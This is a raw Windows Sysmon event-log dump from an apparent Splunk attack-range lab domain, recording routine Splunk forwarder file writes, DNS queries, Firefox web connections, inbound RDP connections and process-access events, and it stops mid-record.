09:10:21.509{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F42FED74FC4B40918C121C7E0531A21,SHA256=3680AC1A9FBC5B8FD06B0FB63A0404E38D8225F8B5417D18BFE397AF47C611E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978490Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:19.055{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59952-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978489Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:22.708{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0CB370908830B7B3118A7C8F85D961C,SHA256=A00EE5CB6A4985D3B80D17D3D97339737229D7CDE9EC722B3F03529D21C25505,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.509{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7C7253C72632238B55C745ED96EA86F,SHA256=EE94D8840030B8708AAB8A9CF4DBAD0A682B508C58D18330BBBC4C85F68CB170,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978488Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:22.285{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5ACD2B43E16E7BA8684DD4D048787B04,SHA256=772CBDCD5AB38BC2DD6A45AA1C48BE6D21F01B908FDCDF8E66A2BACCD04570CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:20.247{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53344-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 354300x80000000000000001049871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:20.246{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local59365- 354300x80000000000000001049870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:20.242{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64460- 354300x80000000000000001049869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:20.242{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64460-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domain 354300x8000000000000000978493Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:20.439{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60968-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978492Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:23.723{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21E371DB57C11056EE9D4C30FA68931E,SHA256=ECE56ED459EFE83450DAC57BDF5AE724DCE45C43F560CCEE2F4D0476D0BAC556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:23.546{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA4CF77C36EF17D4CF30017A61EC4194,SHA256=26D9335F7FA63E306F6BE1B8ACF91D5ED793CB6B34B29A9AE09901406BF68F76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978491Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:23.536{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0FB7506A52908BD70B2270E3A3827784,SHA256=D130CFB84273CA00E954B22E714B58BA43F407BF640D00B3C814038D41423028,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978494Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:24.723{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E64E17655F750CB4DD3FE570402C12D8,SHA256=D0176C18AC7AB870E6E257DD077C704172BF02A001DC9B80A83C3A01C3429B81,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001049884Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.750{5EBD8912-7B3A-6151-3A78-00000000FC01}7120djvbdz1obemzo.cloudfront.net013.226.152.19;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001049883Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.749{5EBD8912-7B3A-6151-3A78-00000000FC01}7120www.amazon.de0type: 5 tp.abe2c2f23-frontier.amazon.de;type: 5 djvbdz1obemzo.cloudfront.net;::ffff:13.226.152.19;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001049882Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:24.650{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48DBBE799587E795A24CF44D07F22702,SHA256=5920AA8C46F141886A399D16C86FCD8BD8E69BB89B9A51443E9755B50D708221,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049881Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:24.550{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A25DDC0E1AE951FFD038D46DDA60DE,SHA256=CDCFDBA7A09CC2BF49E698C21225CF407F8761B826330C45DAF93401365039DB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049880Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.441{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49759- 354300x80000000000000001049879Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.440{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54286- 354300x80000000000000001049878Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.440{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64630- 354300x80000000000000001049877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.438{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49679- 354300x80000000000000001049876Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.438{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53280- 354300x80000000000000001049875Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:21.820{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53345-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000978509Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A81-6151-B979-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978508Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A81-6151-B979-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978507Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8A81-6151-B979-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978506Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978505Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978504Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978503Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978502Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978501Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978500Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978499Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978498Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.895{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978497Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.865{69CF5F33-8A81-6151-B979-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978496Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.739{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2B6DDF9865FC21E3F3F97CFF284232B,SHA256=FCCAD43391F219801D92FCD3D87FE5A28FDE38E71062D64B5FF6B30BD55EEB7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978495Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:25.739{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ED8C1389F363B5F0758B1DE6BACA58D,SHA256=139326875A8AA852D5B64765A6973542FE941322338AB5AD07E04506FB03EF29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049887Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:25.581{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E4FE5F210ED0926336D042B4FBEFEA7,SHA256=D4C8E9E7E02F7B8A20DFF42F79CADF8EAF82C3405A5653CA8E97074F4847E16B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049886Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:25.565{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\17010MD5=4AA2392F660F16007A31C878ECD56A44,SHA256=B9780FC70F313756A60F6162C909B55EDA21838B86583FB57EFD9B9434959DED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049885Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:22.965{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61796-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978527Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.942{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EEA0D7FA807C124FDBFAD68350A7A129,SHA256=168A954EAE56D2DE5252950EF95734DF8D98FE69C1A8307A7640E249232A9904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978526Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.880{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0EFA2DBC8566EEC37042D2F2AC79ED3,SHA256=ABDEE15DE8CB76A03817200F5D73BFC89B837DDA1F8227966ED721E085F4861E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978525Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:26.770{69CF5F33-8A82-6151-BA79-00000000FD01}25643412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program 